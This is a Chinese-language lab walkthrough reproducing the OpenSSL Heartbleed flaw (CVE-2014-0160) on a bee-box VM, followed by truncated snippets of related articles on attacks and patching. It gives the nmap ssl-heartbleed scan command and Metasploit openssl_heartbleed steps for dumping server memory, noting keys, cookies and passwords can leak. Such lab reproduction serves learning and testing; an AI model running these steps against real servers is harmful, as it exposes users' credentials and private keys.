心脏滴血漏洞复现(CVE-2014-0160)

漏洞范围:

OpenSSL1.0.1版本

漏洞成因:

Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。

漏洞危害:

如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的私钥,用户cookie和密码等。


漏洞复现:

环境:本次环境使用 bee-box虚拟机(已集成该漏洞环境)进行测试。
bee-box虚拟机下载:链接

1.确定目标及端口信息。这里存在漏洞的靶机端口为8443。

2.使用nmap 的脚本进行检测漏洞是否存在。

nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.224.131

由下图检测结果可以看出存在心脏滴血漏洞。

3.github上也有一个项目,是专门检测心脏滴血漏洞的。链接点这里
本地环境试了一下好像不行,大家自行去分析吧,这个不是我讲的重点。

4.使用msf进行漏洞利用。
a) 打开msfconsole后,查找heartbleed模块:

#msf>search heartbleed

[图片上传中...(image.png-be8875-1514368932518-0)]

b) 使用第一个选项

#msf > use auxiliary/scanner/ssl/openssl_heartbleed

c) 查看需要设置哪些选项

#msf auxiliary(openssl_heartbleed) > show options

d) 这里我们需要设置RHOSTS,RPORT

e) 设置verbose,这个设置要设置成true才能看到泄露的信息

#msf auxiliary(openssl_heartbleed) > set  verbose true
(此设置主要是为了显示整个过程以及leak出来的数据,如果没有的话只显示如下图结果)

f) exploit

#msf auxiliary(openssl_heartbleed) > exploit

g) 如果有人在正在登录该web应用的话,还可能可以直接抓到账号密码等信息。

原文地址:https://www.cnblogs.com/wjw-zm/p/11651382.html

时间: 2024-08-01 11:37:24

心脏滴血漏洞复现(CVE-2014-0160)的相关文章

OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例

OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把. 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1.  Nmap脚本ssl-heartbleed.nse: http://nmap.org/nsedoc/scripts/ssl-heartbleed.html 1 nmap -sV --script=ssl-heartbleed <target> 2. Jared Stafford的testssl.py: https://gist.gith

OpenSSL Heartbleed &quot;心脏滴血&quot;漏洞简单攻击示例

转自:http://www.lijiejie.com/openssl-heartbleed-attack/ OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把. 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1. Nmap脚本ssl-heartbleed.nse: http://nmap.org/nsedoc/scripts/ssl-heartbleed.html nmap -sV --script=ssl-heartbleed <targe

Centos7-修复心脏滴血漏洞

Heartbleed Heartbleed漏洞,这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查.攻击者可以追踪OpenSSL所分配的64KB缓存.将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露. 发现一个关于openssl的严重漏洞,看了下这个漏洞早已了修复方案,那就是升级openssl 查看openssl version  openssl官方网站:h

心脏滴血与利用

心脏滴血漏洞: OpenSSL在实现TLS和DTLS的心跳处理逻辑时,存在编码缺陷.OpenSSL的心跳处理逻辑没有检测心跳包中的长度字段是否和后续的数据字段相符合,攻击者可以利用这一点,构造异常的数据包,来获取心跳数据所在的内存区域的后续数据.这些数据中可能包含了用户名,用户密码,用户邮箱等敏感信息.该漏洞允许攻击者从内存中读取多达64KB的数据.: 获取心脏出血数据: 安装插件:shodan >search heartbleed >use auxiliary/scanner/ssl/ope

关于“心脏出血”漏洞(heartbleed)的理解

前阵子“心脏出血”刚发生的时候读了下源代码,给出了自己觉得比较清楚的理解. -------------------------穿越时空的分割线--------------------------- 参考:http://drops.wooyun.org/papers/1381 这个问题出现在openSSL处理TLS心跳的过程中,TLS心跳的流程是:A向B发送请求包,B收到包后读取这个包的内容(data),并返回一个包含有请求包内容的响应包.请求包的内容(data)中包含有包的类型(type)和数据

8.Structs 2-057漏洞复现

漏洞信息: 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行. url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行. 官方解决方案: 升级至版本2.3.35或2.5.17.这两个版本仅仅只是更新了安全补丁,不存在兼容性问题. 临时解决方案: 推荐用户及时更新,但如果不想更新,可暂时使用官方提供的临时解决方案:当上层动作配置

[漏洞复现]CVE-2019-14287 sudo提权漏洞

漏洞描述 2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警.通过特定payload,用户可提升至root权限. 利用前提 sudo -v < 1.8.28 知道当前用户的密码 当前用户存在于sudo权限列表 漏洞复现 [email protected]:~$ id uid=1000(mark) gid=1000(mark) 组=1000(mark),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),

震网三代漏洞复现

一.  CVE-2017-8464远程命令执行漏洞(震网三代漏洞)复现 漏洞描述: 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享.当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限. 注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名. 漏洞影响范围: Microsoft

OpenSSL心脏出血漏洞全回顾

近日网络安全界谈论的影响安全最大的问题就是Heartbleed漏洞,该漏洞是4月7号国外黑客曝光的.据Vox网站介绍,来自Codenomicon和谷歌安全部门的研究人员,发现OpenSSL的源代码中存在一个漏洞,可以让攻击者获得服务器上64K内存中的数据内容.该漏洞在国内被译为” OpenSSL心脏出血漏洞”,因其破坏性之大和影响的范围之广,堪称网络安全里程碑事件. OpenSSL心脏出血漏洞的大概原理是OpenSSL在2年前引入了心跳(heartbeat)机制来维持TLS链接的长期存在,心跳机